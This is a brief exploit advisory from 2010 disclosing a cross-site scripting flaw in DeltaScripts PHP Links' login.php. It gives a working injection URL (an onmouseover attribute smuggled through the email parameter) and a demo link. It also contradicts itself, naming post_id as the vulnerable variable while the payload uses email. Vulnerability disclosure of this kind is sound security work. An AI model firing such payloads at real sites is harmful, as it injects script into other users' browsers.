########################################################## H A C K - T E C H E X P L O I T S - by Crux ########################################################## [+] Exploit Title: DeltaScripts PHP Links XSS Vulnerability [+] Date: January 09 2010 [+] Author: Crux [mail:cruxtheking@live.com] [+] Software Link: http://www.deltascripts.com/phplinks/ [+] Version: 1.0 [+] Tested on: ALL OS [+] Dork: NO NO NO! [ Vulnerable File ] login.php (The post variable, post_id) [ EXPLOIT ] /login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1 [ DEMO ] http://sitename.com/phplinks/login.php?email=%F6"+onmouseover=prompt(31337)//&submit=Login&forgotten=1 [+] Greetz to the peeps at hack-tech.com. ########################################################## ________________________________ Windows Live: Make it easier for your friends to see what you’re up to on Facebook.